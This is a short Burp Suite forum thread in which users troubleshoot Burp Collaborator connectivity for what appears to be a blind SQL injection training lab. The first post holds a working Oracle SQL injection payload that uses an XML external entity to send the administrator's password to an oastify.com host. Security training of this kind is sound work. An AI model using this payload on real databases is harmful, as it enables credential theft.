The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

Blind SQL injection with out-of-band data exfiltration

Yan | Last updated: Sep 02, 2022 02:17PM UTC

Hi Team, same issue: oastify.com does not work on my Collaborator. Please see my payload below:

' || SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password from users where username='administrator')||'.lg533no4d4xfpdxezno2qlhg47axym.oastify.com"> %remote;]>'),'/l') FROM dual--

Michelle, PortSwigger Agent | Last updated: Sep 02, 2022 03:02PM UTC

To poll for results using the Collaborator client, the machine where you have Burp installed will need to be able to access oastify.com, so you may need to check if this is being blocked by a firewall. You can test connectivity by going to Project Options -> Misc -> Burp Collaborator Server -> Run health check. I hope this helps.

Yan | Last updated: Sep 03, 2022 05:08PM UTC

Hi Michelle, thanks for responding! Very appreciated! I have a Mac; is it the same step-by-step process to run the health check?

Michelle, PortSwigger Agent | Last updated: Sep 05, 2022 09:53AM UTC

Hi, yes, it's the same steps to run the Collaborator health check on a Mac.

Eduard | Last updated: Jan 16, 2023 02:50PM UTC

I have the same issue; the health check showed me that there is only an issue with SMTP.

Michelle, PortSwigger Agent | Last updated: Jan 16, 2023 04:46PM UTC